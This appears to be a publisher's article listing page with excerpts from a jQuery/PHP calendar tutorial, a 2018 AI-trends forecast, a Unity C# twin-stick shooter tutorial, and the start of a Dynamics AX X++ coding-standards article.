the weekCalendar call: $(document).ready(function() { $('#calendar_wrapper').weekCalendar({ 'height':function($calendar){ return $('#calendar_wrapper')[0].offsetHeight; }, 'eventNew':function(calEvent, $event) { calendar_new_entry(calEvent,$event); } }); }); When an event is created, the calendar_new_entry function will be called with details of the new event in the calEvent parameter. Now, add the function calendar_new_entry: function calendar_new_entry(calEvent,$event){ var ds=calEvent.start, df=calEvent.end; $('<div id="calendar_new_entry_form" title="New Calendar Entry"> event name<br /> <input value="new event" id="calendar_new_entry_form_title" /> <br /> body text<br /> <textarea style="width:400px;height:200px" id="calendar_new_entry_form_body">event description </textarea> </div>').appendTo($('body')); $("#calendar_new_entry_form").dialog({ bgiframe: true, autoOpen: false, height: 440, width: 450, modal: true, buttons: { 'Save': function() { var $this=$(this); $.getJSON('./calendar.php?action=save&id=0&start=' +ds.getTime()/1000+'&end='+df.getTime()/1000, { 'body':$('#calendar_new_entry_form_body').val(), 'title':$('#calendar_new_entry_form_title').val() }, function(ret){ $this.dialog('close'); $('#calendar_wrapper').weekCalendar('refresh'); $("#calendar_new_entry_form").remove(); } ); }, Cancel: function() { $event.remove(); $(this).dialog('close'); $("#calendar_new_entry_form").remove(); } }, close: function() { $('#calendar').weekCalendar('removeUnsavedEvents'); $("#calendar_new_entry_form").remove(); } }); $("#calendar_new_entry_form").dialog('open'); } What's happening here is that a form is created and added to the body (the second line of the function), then the third line of the function creates a modal window from that form and adds some buttons to it. Our modal dialog should look like this: The Save button, when pressed, calls the server-side file calendar.php with the parameters needed to save the event, including the start and end, and the title and body. When the result returns, the calendar is refreshed with the new event's data included. When any of the buttons are clicked, we close the dialog and remove it from the page completely. Note how we are sending time information to the server (shown highlighted in the code we just saw). JavaScript time functions usually measure in milliseconds, but we want to send it to PHP, which generally measures time in seconds. So, we convert the value on the client so that the PHP can use the received data as it is, without needing to do anything to it. Every little helps! Server-side code On the server side, we want to take the new event and save it. Remember that we're doing it in sessions in this example, but you should feel free to adapt this to any other model that you wish. Create a file called calendar.php and save it with this source in it: <?php session_start(); if(!isset($_SESSION['calendar'])){ $_SESSION['calendar']=array( 'ids'=>0, ); } if(isset($_REQUEST['action'])){ switch($_REQUEST['action']){ case 'save': // { $start_date=(int)$_REQUEST['start']; $data=array( 'title'=>(isset($_REQUEST['title'])?$_REQUEST['title']:''), 'body' =>(isset($_REQUEST['body'])?$_REQUEST['body']:''), 'start'=>date('c',$start_date), 'end' =>date('c',(int)$_REQUEST['end']) ); $id=(int)$_REQUEST['id']; if($id && isset($_SESSION['calendar'][$id])){ $_SESSION['calendar'][$id]=$data; } else{ $id= ++$_SESSION['calendar']['ids']; $_SESSION['calendar'][$id]=$data; } echo 1; exit; // } } } ?> In the server-side code of this project, all the requested actions are handled by a switch statement. This is done for demonstration purposes—whenever we add a new action, we simply add a new switch case. If you are using this for your own purposes, you may wish to rewrite it using functions instead of large switch cases. The date function is used to convert the start and end parameters into ISO 8601 date format. That's the format jquery-week-calendar prefers, so we'll try to keep everything in that format. Visually, nothing appears to happen, but the data is actually being saved. To see what's being saved, create a new file named test.php, and use the var_dump function in it to examine the session data (view it in your browser): <?php session_start(); var_dump($_SESSION); ?> Here's an example from my test machine:
Read more
  • 0
  • 0
  • 5951

article-image-18-striking-ai-trends-2018-part-1
Sugandha Lahoti
27 Dec 2017
14 min read
Save for later

18 striking AI Trends to watch in 2018 - Part 1

Sugandha Lahoti
27 Dec 2017
14 min read
Artificial Intelligence is the talk of the town. It has evolved past merely being a buzzword in 2016, to be used in a more practical manner in 2017. As 2018 rolls out, we will gradually notice AI transitioning into a necessity. We have prepared a detailed report, on what we can expect from AI in the upcoming year. So sit back, relax, and enjoy the ride through the future. (Don’t forget to wear your VR headgear! ) Here are 18 things that will happen in 2018 that are either AI driven or driving AI: Artificial General Intelligence may gain major traction in research. We will turn to AI enabled solution to solve mission-critical problems. Machine Learning adoption in business will see rapid growth. Safety, ethics, and transparency will become an integral part of AI application design conversations. Mainstream adoption of AI on mobile devices Major research on data efficient learning methods AI personal assistants will continue to get smarter Race to conquer the AI optimized hardware market will heat up further We will see closer AI integration into our everyday lives. The cryptocurrency hype will normalize and pave way for AI-powered Blockchain applications. Advancements in AI and Quantum Computing will share a symbiotic relationship Deep learning will continue to play a significant role in AI development progress. AI will be on both sides of the cybersecurity challenge. Augmented reality content will be brought to smartphones. Reinforcement learning will be applied to a large number of real-world situations. Robotics development will be powered by Deep Reinforcement learning and Meta-learning Rise in immersive media experiences enabled by AI. A large number of organizations will use Digital Twin. 1. General AI: AGI may start gaining traction in research. AlphaZero is only the beginning. 2017 saw Google’s AlphaGo Zero (and later AlphaZero) beat human players at Go, Chess, and other games. In addition to this, computers are now able to recognize images, understand speech, drive cars, and diagnose diseases better with time. AGI is an advancement of AI which deals with bringing machine intelligence as close to humans as possible. So, machines can possibly do any intellectual task that a human can! The success of AlphaGo covered one of the crucial aspects of AGI systems—the ability to learn continually, avoiding catastrophic forgetting. However, there is a lot more to achieving human-level general intelligence than the ability to learn continually. For instance, AI systems of today can draw on skills it learned on one game to play another. But they lack the ability to generalize the learned skill. Unlike humans, these systems do not seek solutions from previous experiences. An AI system cannot ponder and reflect on a new task, analyze its capabilities, and work out how best to apply them. In 2018, we expect to see advanced research in the areas of deep reinforcement learning, meta-learning, transfer learning, evolutionary algorithms and other areas that aid in developing AGI systems. Detailed aspects of these ideas are highlighted in later points. We can indeed say, Artificial General Intelligence is inching closer than ever before and 2018 is expected to cover major ground in that direction. 2. Enterprise AI: Machine Learning adoption in enterprises will see rapid growth. 2017 saw a rise in cloud offerings by major tech players, such as the Amazon Sagemaker, Microsoft Azure Cloud, Google Cloud Platform, allowing business professionals and innovators to transfer labor-intensive research and analysis to the cloud. Cloud is a $130 billion industry as of now, and it is projected to grow.  Statista carried out a survey to present the level of AI adoption among businesses worldwide, as of 2017.  Almost 80% of the participants had incorporated some or other form of AI into their organizations or planned to do so in the future. Source: https://www.statista.com/statistics/747790/worldwide-level-of-ai-adoption-business/ According to a report from Deloitte, medium and large enterprises are set to double their usage of machine learning by the end of 2018. Apart from these, 2018 will see better data visualization techniques, powered by machine learning, which is a critical aspect of every business.  Artificial intelligence is going to automate the cycle of report generation and KPI analysis, and also, bring in deeper analysis of consumer behavior. Also with abundant Big data sources coming into the picture, BI tools powered by AI will emerge, which can harness the raw computing power of voluminous big data for data models to become streamlined and efficient. 3. Transformative AI: We will turn to AI enabled solutions to solve mission-critical problems. 2018 will see the involvement of AI in more and more mission-critical problems that can have world-changing consequences: read enabling genetic engineering, solving the energy crisis, space exploration, slowing climate change, smart cities, reducing starvation through precision farming, elder care etc. Recently NASA revealed the discovery of a new exoplanet, using data crunched from Machine learning and AI. With this recent reveal, more AI techniques would be used for space exploration and to find other exoplanets. We will also see the real-world deployment of AI applications. So it will not be only about academic research, but also about industry readiness. 2018 could very well be the year when AI becomes real for medicine. According to Mark Michalski, executive director, Massachusetts General Hospital and Brigham and Women’s Center for Clinical Data Science, “By the end of next year, a large number of leading healthcare systems are predicted to have adopted some form of AI within their diagnostic groups.”  We would also see the rise of robot assistants, such as virtual nurses, diagnostic apps in smartphones, and real clinical robots that can monitor patients, take care of the elderly, alert doctors, and send notifications in case of emergency. More research will be done on how AI enabled technology can help in difficult to diagnose areas in health care like mental health, the onset of hereditary diseases among others. Facebook's attempt at detection of potential suicidal messages using AI is a sign of things to come in this direction. As we explore AI enabled solutions to solve problems that have a serious impact on individuals and societies at large, considering the ethical and moral implications of such solutions will become central to developing them, let alone hard to ignore. 4. Safe AI: Safety, Ethics, and Transparency in AI applications will become integral to conversations on AI adoption and app design. The rise of machine learning capabilities has also given rise to forms of bias, stereotyping and unfair determination in such systems. 2017 saw some high profile news stories about gender bias, object recognition datasets like MS COCO, to racial disparities in education AI systems. At NIPS 2017, Kate Crawford talked about bias in machine learning systems which resonated greatly with the community and became pivotal to starting conversations and thinking by other influencers on how to address the problems raised.  DeepMind also launched a new unit, the DeepMind Ethics & Society,  to help technologists put ethics into practice, and to help society anticipate and direct the impact of AI for the benefit of all. Independent bodies like IEEE also pushed for standards in it’s ethically aligned design paper. As news about the bro culture in Silicon Valley and the lack of diversity in the tech sector continued to stay in the news all of 2017, it hit closer home as the year came to an end, when Kristian Lum, Lead Statistician at HRDAG, described her experiences with harassment as a graduate student at prominent stat conferences. This has had a butterfly effect of sorts with many more women coming forward to raise the issue in the ML/AI community. They talked about the formation of a stronger code of conduct by boards of key conferences such as NIPS among others. Eric Horvitz, a Microsoft research director, called Lum’s post a "powerful and important report." Jeff Dean, head of Google’s Brain AI unit applauded Lum for having the courage to speak about this behavior. Other key influencers from the ML and statisticians community also spoke in support of Lum and added their views on how to tackle the problem. While the road to recovery is long and machines with moral intelligence may be decades away, 2018 is expected to start that journey in the right direction by including safety, ethics, and transparency in AI/ML systems. Instead of just thinking about ML contributing to decision making in say hiring or criminal justice, data scientists would begin to think of the potential role of ML in the harmful representation of human identity. These policies will not only be included in the development of larger AI ecosystems but also in national and international debates in politics, businesses, and education. 5. Ubiquitous AI: AI will start redefining life as we know it, and we may not even know it happened. Artificial Intelligence will gradually integrate into our everyday lives. We will see it in our everyday decisions like what kind of food we eat, the entertainment we consume, the clothes we wear, etc.  Artificially intelligent systems will get better at complex tasks that humans still take for granted, like walking around a room and over objects. We’re going to see more and more products that contain some form of AI enter our lives. AI enabled stuff will become more common and available. We will also start seeing it in the background for life-altering decisions we make such as what to learn, where to work, whom to love, who our friends are,  whom should we vote for, where should we invest, and where should we live among other things. 6. Embedded AI: Mobile AI means a radically different way of interacting with the world. There is no denying that AI is the power source behind the next generation of smartphones. A large number of organizations are enabling the use of AI in smartphones, whether in the form of deep learning chips, or inbuilt software with AI capabilities. The mobile AI will be a  combination of on-device AI and cloud AI. Intelligent phones will have end-to-end capabilities that support coordinated development of chips, devices, and the cloud. The release of iPhone X’s FaceID—which uses a neural network chip to construct a mathematical model of the user’s face— and self-driving cars are only the beginning. As 2018 rolls out we will see vast applications on smartphones and other mobile devices which will run deep neural networks to enable AI. AI going mobile is not just limited to the embedding of neural chips in smartphones. The next generation of mobile networks 5G will soon greet the world. 2018 is going to be a year of closer collaborations and increasing partnerships between telecom service providers, handset makers, chip markers and AI tech enablers/researchers. The Baidu-Huawei partnership—to build an open AI mobile ecosystem, consisting of devices, technology, internet services, and content—is an example of many steps in this direction. We will also see edge computing rapidly becoming a key part of the Industrial Internet of Things (IIoT) to accelerate digital transformation. In combination with cloud computing, other forms of network architectures such as fog and mist would also gain major traction. All of the above will lead to a large-scale implementation of cognitive IoT, which combines traditional IoT implementations with cognitive computing. It will make sensors capable of diagnosing and adapting to their environment without the need for human intervention. Also bringing in the ability to combine multiple data streams that can identify patterns. This means we will be a lot closer to seeing smart cities in action. 7. Data-sparse AI: Research into data efficient learning methods will intensify 2017 saw highly scalable solutions for problems in object detection and recognition, machine translation, text-to-speech, recommender systems, and information retrieval.  The second conference on Machine Translation happened in September 2017.  The 11th ACM Conference on Recommender Systems in August 2017 witnessed a series of papers presentations, featured keynotes, invited talks, tutorials, and workshops in the field of recommendation system. Google launched the Tacotron 2 for generating human-like speech from text. However, most of these researches and systems attain state-of-the-art performance only when trained with large amounts of data. With GDPR and other data regulatory frameworks coming into play, 2018 is expected to witness machine learning systems which can learn efficiently maintaining performance, but in less time and with less data. A data-efficient learning system allows learning in complex domains without requiring large quantities of data. For this, there would be developments in the field of semi-supervised learning techniques, where we can use generative models to better guide the training of discriminative models. More research would happen in the area of transfer learning (reuse generalize knowledge across domains), active learning, one-shot learning, Bayesian optimization as well as other non-parametric methods.  In addition, researchers and organizations will exploit bootstrapping and data augmentation techniques for efficient reuse of available data. Other key trends propelling data efficient learning research are growing in-device/edge computing, advancements in robotics, AGI research, and energy optimization of data centers, among others. 8. Conversational AI: AI personal assistants will continue to get smarter AI-powered virtual assistants are expected to skyrocket in 2018. 2017 was filled to the brim with new releases. Amazon brought out the Echo Look and the Echo Show. Google made its personal assistant more personal by allowing linking of six accounts to the Google Assistant built into the Home via the Home app. Bank of America unveiled Erica, it’s AI-enabled digital assistant. As 2018 rolls out, AI personal assistants will find its way into an increasing number of homes and consumer gadgets. These include increased availability of AI assistants in our smartphones and smart speakers with built-in support for platforms such as Amazon’s Alexa and Google Assistant. With the beginning of the new year, we can see personal assistants integrating into our daily routines. Developers will build voice support into a host of appliances and gadgets by using various voice assistant platforms. More importantly, developers in 2018 will try their hands on conversational technology which will include emotional sensitivity (affective computing) as well as machine translational technology (the ability to communicate seamlessly between languages). Personal assistants would be able to recognize speech patterns, for instance, of those indicative of wanting help. AI bots may also be utilized for psychiatric counseling or providing support for isolated people.  And it’s all set to begin with the AI assistant summit in San Francisco scheduled on 25 - 26 January 2018. It will witness talks by world's leading innovators in advances in AI Assistants and artificial intelligence. 9. AI Hardware: Race to conquer the AI optimized hardware market will heat up further Top tech companies (read Google, IBM, Intel, Nvidia) are investing heavily in the development of AI/ML optimized hardware. Research and Markets have predicted the global AI chip market will have a growth rate of about 54% between 2017 and 2021. 2018 will see further hardware designs intended to greatly accelerate the next generation of applications and run AI computational jobs. With the beginning of 2018 chip makers will battle it out to determine who creates the hardware that artificial intelligence lives on. Not only that, there would be a rise in the development of new AI products, both for hardware and software platforms that run deep learning programs and algorithms. Also, chips which move away from the traditional one-size-fits-all approach to application-based AI hardware will grow in popularity. 2018 would see hardware which does not only store data, but also transform it into usable information. The trend for AI will head in the direction of task-optimized hardware. 2018 may also see hardware organizations move to software domains and vice-versa. Nvidia, most famous for their Volta GPUs have come up with NVIDIA DGX-1, a software for AI research, designed to streamline the deep learning workflow. More such transitions are expected at the highly anticipated CES 2018. [dropcap]P[/dropcap]hew, that was a lot of writing! But I hope you found it just as interesting to read as I found writing it. However, we are not done yet. And here is part 2 of our 18 AI trends in ‘18. 
Read more
  • 0
  • 0
  • 5949

article-image-2d-twin-stick-shooter
Packt
11 Nov 2014
21 min read
Save for later

2D Twin-stick Shooter

Packt
11 Nov 2014
21 min read
This article written by John P. Doran, the author of Unity Game Development Blueprints, teaches us how to use Unity to prepare a well formed game. It also gives people experienced in this field a chance to prepare some great stuff. (For more resources related to this topic, see here.) The shoot 'em up genre of games is one of the earliest kinds of games. In shoot 'em ups, the player character is a single entity fighting a large number of enemies. They are typically played with a top-down perspective, which is perfect for 2D games. Shoot 'em up games also exist with many categories, based upon their design elements. Elements of a shoot 'em up were first seen in the 1961 Spacewar! game. However, the concept wasn't popularized until 1978 with Space Invaders. The genre was quite popular throughout the 1980s and 1990s and went in many different directions, including bullet hell games, such as the titles of the Touhou Project. The genre has recently gone through a resurgence in recent years with games such as Bizarre Creations' Geometry Wars: Retro Evolved, which is more famously known as a twin-stick shooter. Project overview Over the course of this article, we will be creating a 2D multidirectional shooter game similar to Geometry Wars. In this game, the player controls a ship. This ship can move around the screen using the keyboard and shoot projectiles in the direction that the mouse is points at. Enemies and obstacles will spawn towards the player, and the player will avoid/shoot them. This article will also serve as a refresher on a lot of the concepts of working in Unity and give an overview of the recent addition of native 2D tools into Unity. Your objectives This project will be split into a number of tasks. It will be a simple step-by-step process from beginning to end. Here is the outline of our tasks: Setting up the project Creating our scene Adding in player movement Adding in shooting functionality Creating enemies Adding GameController to spawn enemy waves Particle systems Adding in audio Adding in points, score, and wave numbers Publishing the game Prerequisites Before we start, we will need to get the latest Unity version, which you can always get by going to http://unity3d.com/unity/download/ and downloading it there: At the time of writing this article, the version is 4.5.3, but this project should work in future versions with minimal changes. Navigate to the preceding URL, and download the Chapter1.zip package and unzip it. Inside the Chapter1 folder, there are a number of things, including an Assets folder, which will have the art, sound, and font files you'll need for the project as well as the Chapter_1_Completed.unitypackage (this is the complete article package that includes the entire project for you to work with). I've also added in the complete game exported (TwinstickShooter Exported) as well as the entire project zipped up in the TwinstickShooter Project.zip file. Setting up the project At this point, I have assumed that you have Unity freshly installed and have started it up. With Unity started, go to File | New Project. Select Project Location of your choice somewhere on your hard drive, and ensure you have Setup defaults for set to 2D. Once completed, select Create. At this point, we will not need to import any packages, as we'll be making everything from scratch. It should look like the following screenshot: From there, if you see the Welcome to Unity pop up, feel free to close it out as we won't be using it. At this point, you will be brought to the general Unity layout, as follows: Again, I'm assuming you have some familiarity with Unity before reading this article; if you would like more information on the interface, please visit http://docs.unity3d.com/Documentation/Manual/LearningtheInterface.html. Keeping your Unity project organized is incredibly important. As your project moves from a small prototype to a full game, more and more files will be introduced to your project. If you don't start organizing from the beginning, you'll keep planning to tidy it up later on, but as deadlines keep coming, things may get quite out of hand. This organization becomes even more vital when you're working as part of a team, especially if your team is telecommuting. Differing project structures across different coders/artists/designers is an awful mess to find yourself in. Setting up a project structure at the start and sticking to it will save you countless minutes of time in the long run and only takes a few seconds, which is what we'll be doing now. Perform the following steps: Click on the Create drop-down menu below the Project tab in the bottom-left side of the screen. From there, click on Folder, and you'll notice that a new folder has been created inside your Assets folder. After the folder is created, you can type in the name for your folder. Once done, press Enter for the folder to be created. We need to create folders for the following directories:      Animations      Prefabs      Scenes      Scripts      Sprites If you happen to create a folder inside another folder, you can simply drag-and-drop it from the left-hand side toolbar. If you need to rename a folder, simply click on it once and wait, and you'll be able to edit it again. You can also use Ctrl + D to duplicate a folder if it is selected. Once you're done with the aforementioned steps, your project should look something like this: Creating our scene Now that we have our project set up, let's get started with creating our player: Double-click on the Sprites folder. Once inside, go to your operating system's browser window, open up the Chapter 1/Assets folder that we provided, and drag the playerShip.png file into the folder to move it into our project. Once added, confirm that the image is Sprite by clicking on it and confirming from the Inspector tab that Texture Type is Sprite. If it isn't, simply change it to that, and then click on the Apply button. Have a look at the following screenshot: If you do not want to drag-and-drop the files, you can also right-click within the folder in the Project Browser (bottom-left corner) and select Import New Asset to select a file from a folder to bring it in. The art assets used for this tutorial were provided by Kenney. To see more of their work, please check out www.kenney.nl. Next, drag-and-drop the ship into the scene (the center part that's currently dark gray). Once completed, set the position of the sprite to the center of the Screen (0, 0) by right-clicking on the Transform component and then selecting Reset Position. Have a look at the following screenshot: Now, with the player in the world, let's add in a background. Drag-and-drop the background.png file into your Sprites folder. After that, drag-and-drop a copy into the scene. If you put the background on top of the ship, you'll notice that currently the background is in front of the player (Unity puts newly added objects on top of previously created ones if their position on the Z axis is the same; this is commonly referred to as the z-order), so let's fix that. Objects on the same Z axis without sorting layer are considered to be equal in terms of draw order; so just because a scene looks a certain way this time, when you reload the level it may look different. In order to guarantee that an object is in front of another one in 2D space is by having different Z values or using sorting layers. Select your background object, and go to the Sprite Renderer component from the Inspector tab. Under Sorting Layer, select Add Sorting Layer. After that, click on the + icon for Sorting Layers, and then give Layer 1 a name, Background. Now, create a sorting layer for Foreground and GUI. Have a look at the following screenshot: Now, place the player ship on the foreground and the background by selecting the object once again and then setting the Sorting Layer property via the drop-down menu. Now, if you play the game, you'll see that the ship is in front of the background, as follows: At this point, we can just duplicate our background a number of times to create our full background by selecting the object in the Hierarchy, but that is tedious and time-consuming. Instead, we can create all of the duplicates by either using code or creating a tileable texture. For our purposes, we'll just create a texture. Delete the background sprite by left-clicking on the background object in the Hierarchy tab on the left-hand side and then pressing the Delete key. Then select the background sprite in the Project tab, change Texture Type in the Inspector tab to Texture, and click on Apply. Now let's create a 3D cube by selecting Game Object | Create Other | Cube from the top toolbar. Change the object's name from Cube to Background. In the Transform component, change the Position to (0, 0, 1) and the Scale to (100, 100, 1). If you are using Unity 4.6 you will need to go to Game Object | 3D Object | Cube to create the cube. Since our camera is at 0, 0, -10 and the player is at 0, 0, 0, putting the object at position 0, 0, 1 will put it behind all of our sprites. By creating a 3D object and scaling it, we are making it really large, much larger than the player's monitor. If we scaled a sprite, it would be one really large image with pixelation, which would look really bad. By using a 3D object, the texture that is applied to the faces of the 3D object is repeated, and since the image is tileable, it looks like one big continuous image. Remove Box Collider by right-clicking on it and selecting Remove Component. Next, we will need to create a material for our background to use. To do so, under the Project tab, select Create | Material, and name the material as BackgroundMaterial. Under the Shader property, click on the drop-down menu, and select Unlit | Texture. Click on the Texture box on the right-hand side, and select the background texture. Once completed, set the Tiling property's x and y to 25. Have a look at the following screenshot: In addition to just selecting from the menu, you can also drag-and-drop the background texture directly onto the Texture box, and it will set the property. Tiling tells Unity how many times the image should repeat in the x and y positions, respectively. Finally, go back to the Background object in Hierarchy. Under the Mesh Renderer component, open up Materials by left-clicking on the arrow, and change Element 0 to our BackgroundMaterial material. Consider the following screenshot: Now, when we play the game, you'll see that we now have a complete background that tiles properly. Scripting 101 In Unity, the behavior of game objects is controlled by the different components that are attached to them in a form of association called composition. These components are things that we can add and remove at any time to create much more complex objects. If you want to do anything that isn't already provided by Unity, you'll have to write it on your own through a process we call scripting. Scripting is an essential element in all but the simplest of video games. Unity allows you to code in either C#, Boo, or UnityScript, a language designed specifically for use with Unity and modelled after JavaScript. For this article, we will use C#. C# is an object-oriented programming language—an industry-standard language similar to Java or C++. The majority of plugins from Asset Store are written in C#, and code written in C# can port to other platforms, such as mobile, with very minimal code changes. C# is also a strongly-typed language, which means that if there is any issue with the code, it will be identified within Unity and will stop you from running the game until it's fixed. This may seem like a hindrance, but when working with code, I very much prefer to write correct code and solve problems before they escalate to something much worse. Implementing player movement Now, at this point, we have a great-looking game, but nothing at all happens. Let's change that now using our player. Perform the following steps: Right-click on the Scripts folder you created earlier, click on Create, and select the C# Script label. Once you click on it, a script will appear in the Scripts folder, and it should already have focus and should be asking you to type a name for the script—call it PlayerBehaviour. Double-click on the script in Unity, and it will open MonoDevelop, which is an open source integrated development environment (IDE) that is included with your Unity installation. After MonoDevelop has loaded, you will be presented with the C# stub code that was created automatically for you by Unity when you created the C# script. Let's break down what's currently there before we replace some of it with new code. At the top, you will see two lines: using UnityEngine;using System.Collections; The engine knows that if we refer to a class that isn't located inside this file, then it has to reference the files within these namespaces for the referenced class before giving an error. We are currently using two namespaces. The UnityEngine namespace contains interfaces and class definitions that let MonoDevelop know about all the addressable objects inside Unity. The System.Collections namespace contains interfaces and classes that define various collections of objects, such as lists, queues, bit arrays, hash tables, and dictionaries. We will be using a list, so we will change the line to the following: using System.Collections.Generic; The next line you'll see is: public class PlayerBehaviour : MonoBehaviour { You can think of a class as a kind of blueprint for creating a new component type that can be attached to GameObjects, the objects inside our scenes that start out with just a Transform and then have components added to them. When Unity created our C# stub code, it took care of that; we can see the result, as our file is called PlayerBehaviour and the class is also called PlayerBehaviour. Make sure that your .cs file and the name of the class match, as they must be the same to enable the script component to be attached to a game object. Next up is the: MonoBehaviour section of the code. The : symbol signifies that we inherit from a particular class; in this case, we'll use MonoBehaviour. All behavior scripts must inherit from MonoBehaviour directly or indirectly by being derived from it. Inheritance is the idea of having an object to be based on another object or class using the same implementation. With this in mind, all the functions and variables that existed inside the MonoBehaviour class will also exist in the PlayerBehaviour class, because PlayerBehaviour is MonoBehaviour. For more information on the MonoBehaviour class and all the functions and properties it has, check out http://docs.unity3d.com/ScriptReference/MonoBehaviour.html. Directly after this line, we will want to add some variables to help us with the project. Variables are pieces of data that we wish to hold on to for one reason or another, typically because they will change over the course of a program, and we will do different things based on their values. Add the following code under the class definition: // Movement modifier applied to directional movement.public float playerSpeed = 2.0f;// What the current speed of our player isprivate float currentSpeed = 0.0f;/** Allows us to have multiple inputs and supports keyboard,* joystick, etc.*/public List<KeyCode> upButton;public List<KeyCode> downButton;public List<KeyCode> leftButton;public List<KeyCode> rightButton;// The last movement that we've madeprivate Vector3 lastMovement = new Vector3(); Between the variable definitions, you will notice comments to explain what each variable is and how we'll use it. To write a comment, you can simply add a // to the beginning of a line and everything after that is commented upon so that the compiler/interpreter won't see it. If you want to write something that is longer than one line, you can use /* to start a comment, and everything inside will be commented until you write */ to close it. It's always a good idea to do this in your own coding endeavors for anything that doesn't make sense at first glance. For those of you working on your own projects in teams, there is an additional form of commenting that Unity supports, which may make your life much nicer: XML comments. They take up more space than the comments we are using, but also document your code for you. For a nice tutorial about that, check out http://unitypatterns.com/xml-comments/. In our game, the player may want to move up using either the arrow keys or the W key. You may even want to use something else. Rather than restricting the player to just having one button, we will store all the possible ways to go up, down, left, or right in their own container. To do this, we are going to use a list, which is a holder for multiple objects that we can add or remove while the game is being played. For more information on lists, check out http://msdn.microsoft.com/en-us/library/6sh2ey19(v=vs.110).aspx One of the things you'll notice is the public and private keywords before the variable type. These are access modifiers that dictate who can and cannot use these variables. The public keyword means that any other class can access that property, while private means that only this class will be able to access this variable. Here, currentSpeed is private because we want our current speed not to be modified or set anywhere else. But, you'll notice something interesting with the public variables that we've created. Go back into the Unity project and drag-and-drop the PlayerBehaviour script onto the playerShip object. Before going back to the Unity project though, make sure that you save your PlayerBehaviour script. Not saving is a very common mistake made by people working with MonoDevelop. Have a look at the following screenshot: You'll notice now that the public variables that we created are located inside Inspector for the component. This means that we can actually set those variables inside Inspector without having to modify the code, allowing us to tweak values in our code very easily, which is a godsend for many game designers. You may also notice that the names have changed to be more readable. This is because of the naming convention that we are using with each word starting with a capital letter. This convention is called CamelCase (more specifically headlessCamelCase). Now change the Size of each of the Button variables to 2, and fill in the Element 0 value with the appropriate arrow and Element 1 with W for up, A for left, S for down, and D for right. When this is done, it should look something like the following screenshot: Now that we have our variables set, go back to MonoDevelop for us to work on the script some more. The line after that is a function definition for a method called Start; it isn't a user method but one that belongs to MonoBehaviour. Where variables are data, functions are the things that modify and/or use that data. Functions are self-contained modules of code (enclosed within braces, { and }) that accomplish a certain task. The nice thing about using a function is that once a function is written, it can be used over and over again. Functions can be called from inside other functions: void Start () {} Start is only called once in the lifetime of the behavior when the game starts and is typically used to initialize data. If you're used to other programming languages, you may be surprised that initialization of an object is not done using a constructor function. This is because the construction of objects is handled by the editor and does not take place at the start of gameplay as you might expect. If you attempt to define a constructor for a script component, it will interfere with the normal operation of Unity and can cause major problems with the project. However, for this behavior, we will not need to use the Start function. Perform the following steps: Delete the Start function and its contents. The next function that we see included is the Update function. Also inherited from MonoBehaviour, this function is called for every frame that the component exists in and for each object that it's attached to. We want to update our player ship's rotation and movement every turn. Inside the Update function (between { and }), put the following lines of code: // Rotate player to face mouse Rotation(); // Move the player's body Movement(); Here, I called two functions, but these functions do not exist, because we haven't created them yet. Let's do that now! Below the Update function and before }, put the following function to close the class: // Will rotate the ship to face the mouse.void Rotation(){// We need to tell where the mouse is relative to the// playerVector3 worldPos = Input.mousePosition;worldPos = Camera.main.ScreenToWorldPoint(worldPos);/*   * Get the differences from each axis (stands for   * deltaX and deltaY)*/float dx = this.transform.position.x - worldPos.x;float dy = this.transform.position.y - worldPos.y;// Get the angle between the two objectsfloat angle = Mathf.Atan2(dy, dx) * Mathf.Rad2Deg;/*   * The transform's rotation property uses a Quaternion,   * so we need to convert the angle in a Vector   * (The Z axis is for rotation for 2D).*/Quaternion rot = Quaternion.Euler(new Vector3(0, 0, angle + 90));// Assign the ship's rotationthis.transform.rotation = rot;} Now if you comment out the Movement line and run the game, you'll notice that the ship will rotate in the direction in which the mouse is. Have a look at the following screenshot: Below the Rotation function, we now need to add in our Movement function the following code: // Will move the player based off of keys pressedvoid Movement(){// The movement that needs to occur this frameVector3 movement = new Vector3();// Check for inputmovement += MoveIfPressed(upButton, Vector3.up);movement += MoveIfPressed(downButton, Vector3.down);movement += MoveIfPressed(leftButton, Vector3.left);movement += MoveIfPressed(rightButton, Vector3.right);/*   * If we pressed multiple buttons, make sure we're only   * moving the same length.*/movement.Normalize ();// Check if we pressed anythingif(movement.magnitude > 0){   // If we did, move in that direction   currentSpeed = playerSpeed;   this.transform.Translate(movement * Time.deltaTime *                           playerSpeed, Space.World);   lastMovement = movement;}else{   // Otherwise, move in the direction we were going   this.transform.Translate(lastMovement * Time.deltaTime                           * currentSpeed, Space.World);   // Slow down over time   currentSpeed *= .9f;}} Now inside this function I've created another function called MoveIfPressed, so we'll need to add that in as well. Below this function, add in the following function as well: /** Will return the movement if any of the keys are pressed,* otherwise it will return (0,0,0)*/Vector3 MoveIfPressed( List<KeyCode> keyList, Vector3 Movement){// Check each key in our listforeach (KeyCode element in keyList){   if(Input.GetKey(element))   {     /*       * It was pressed so we leave the function       * with the movement applied.     */    return Movement; }}// None of the keys were pressed, so don't need to movereturn Vector3.zero;} Now, save your file and move back into Unity. Save your current scene as Chapter_1.unity by going to File | Save Scene. Make sure to save the scene to our Scenes folder we created earlier. Run the game by pressing the play button. Have a look at the following screenshot: Now you'll see that we can move using the arrow keys or the W A S D keys, and our ship will rotate to face the mouse. Great! Summary This article talks about the 2D twin-stick shooter game. It helps to bring you to familiarity with the game development features in Unity. Resources for Article: Further resources on this subject: Components in Unity [article] Customizing skin with GUISkin [article] What's Your Input? [article]
Read more
  • 0
  • 1
  • 5947
article-image-technical-best-practices-dynamics-ax-shared-and-aot-object-standards
Packt
23 Oct 2009
15 min read
Save for later

Technical Best Practices for Dynamics AX - Shared and AOT Object Standards

Packt
23 Oct 2009
15 min read
Shared Standards Some Dynamics AX customization best practices are applicable irrespective of AOT element. These standards include X++ standards, naming conventions, label standards, and Help Text guidelines. X++ Standards This section discusses some best practices related to the X++ language. Conformance to this standard results in improved execution time, ease in upgrading and further customization, efficient use of OOP concepts, better readability of code, etc. Some general principles are as follows: Variable or constant or parameter declarations should be as local as possible to utilize memory resources in an efficient way. Error conditions should be checked in the beginning so that minimum work is done for action and rollback of action. This will also hinder denial of service attacks. Denial of service attack is an attempt to stress the system with too many garbage requests so that an authorized user is not served. The parameters supplied as value must not be modified or manipulated as it may increase the chances of using wrong values somewhere else. Code should be written in a clean fashion, which means unused variables, methods, and classes should be removed from the code. The existing MorphX functions or functionality should be used as much as possible (unless other best practices stop you from doing so), rather than creating new ones as it will make upgrading easier. The user should not experience a run-time error. All possible cases should be foreseen and handled accordingly. If some unpredicted case appears during run time, it should show an error in the Infolog with a message to help the users on how to 